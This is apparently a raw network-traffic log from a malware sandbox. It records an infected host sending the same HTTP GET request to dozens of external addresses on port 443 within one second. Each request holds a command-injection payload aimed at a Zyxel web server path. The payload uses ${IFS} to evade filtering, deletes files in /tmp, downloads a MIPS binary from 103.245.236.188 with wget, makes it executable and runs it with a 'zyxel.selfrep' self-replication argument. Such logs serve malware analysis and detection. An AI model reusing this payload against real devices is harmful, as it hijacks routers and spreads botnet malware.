                                    Jan 13, 2024 19:02:50.557583094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8510192.168.2.134271276.254.101.78443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.557610989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8511192.168.2.133281039.189.45.78443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.557663918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8512192.168.2.135294862.39.101.231443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.557718992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8513192.168.2.1351082132.206.98.151443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.557746887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8514192.168.2.1336032168.178.247.127443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.557789087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8515192.168.2.1337338121.79.158.111443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.557873964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8516192.168.2.134891058.106.205.53443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.557919979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8517192.168.2.1351858200.137.90.205443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.557955027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8518192.168.2.1342906140.195.253.147443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.558010101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8519192.168.2.134355683.121.73.11443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.558078051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8520192.168.2.134410623.0.215.220443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.558125019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8521192.168.2.134886025.230.222.240443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.558161974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8522192.168.2.1359966133.174.54.111443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.558211088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8523192.168.2.1359202202.209.137.135443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.558248043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8524192.168.2.1336836195.134.147.144443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.558301926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8525192.168.2.1353502138.226.116.45443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.558356047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8526192.168.2.1341576104.176.66.77443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.558379889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8527192.168.2.1355872151.60.251.242443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.558439016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8528192.168.2.133417098.142.131.185443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.558495998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8529192.168.2.1360372136.100.7.232443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.558556080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8530192.168.2.1355166150.71.123.22443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.558593988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8531192.168.2.1344796135.114.237.2443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.558625937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8532192.168.2.134593227.37.203.95443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.558696985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8533192.168.2.134905690.91.5.235443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.558743000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8534192.168.2.133484031.123.85.3443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.558790922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8535192.168.2.1346950106.12.243.80443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.558825016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8536192.168.2.1355438197.133.208.77443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.558850050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8537192.168.2.1346058103.149.202.126443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.558901072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8538192.168.2.1359552209.11.215.205443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.558981895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8539192.168.2.134962675.153.219.183443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.559020996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8540192.168.2.134810466.75.101.195443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.559053898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8541192.168.2.1334726107.110.14.196443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.559102058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8542192.168.2.1343624191.84.188.188443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.559161901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8543192.168.2.1338236146.201.15.182443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.559211969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8544192.168.2.1354046156.226.198.83443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.559252977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8545192.168.2.135101250.113.203.161443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.559309959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8546192.168.2.1354804150.136.130.44443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.559364080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8547192.168.2.133289895.242.104.254443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.559426069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8548192.168.2.135586297.191.153.233443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.559446096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8549192.168.2.1338712113.252.78.62443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.559526920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8550192.168.2.1358494141.66.0.77443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.559572935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8551192.168.2.1343594166.188.220.32443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.559601068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8552192.168.2.1350382155.142.65.117443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.559657097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8553192.168.2.13546168.3.178.41443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.559693098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8554192.168.2.1356700157.235.74.92443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.559726000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8555192.168.2.136043869.164.63.79443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.559801102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8556192.168.2.1333472112.105.240.90443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.559889078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8557192.168.2.1337544205.121.79.75443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.559926987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8558192.168.2.1346982177.19.110.111443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.559956074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8559192.168.2.1351336161.253.86.121443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.560017109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8560192.168.2.1337028136.125.238.166443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.560092926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8561192.168.2.1349438151.166.65.109443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.560133934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8562192.168.2.1335086170.1.69.200443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.560173988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8563192.168.2.133534451.234.177.110443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.560199976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8564192.168.2.1355774220.194.101.82443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.560223103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8565192.168.2.135558832.111.208.161443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.560267925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8566192.168.2.133669453.106.123.97443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.560329914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8567192.168.2.135380087.157.133.53443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.560370922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8568192.168.2.133367637.124.73.212443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.560419083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8569192.168.2.1358172185.17.255.210443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.560472012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8570192.168.2.135525646.34.204.174443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.560522079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8571192.168.2.134757869.151.137.5443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.560549974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8572192.168.2.1342116123.229.76.37443
                                    TimestampBytes transferredDirectionData
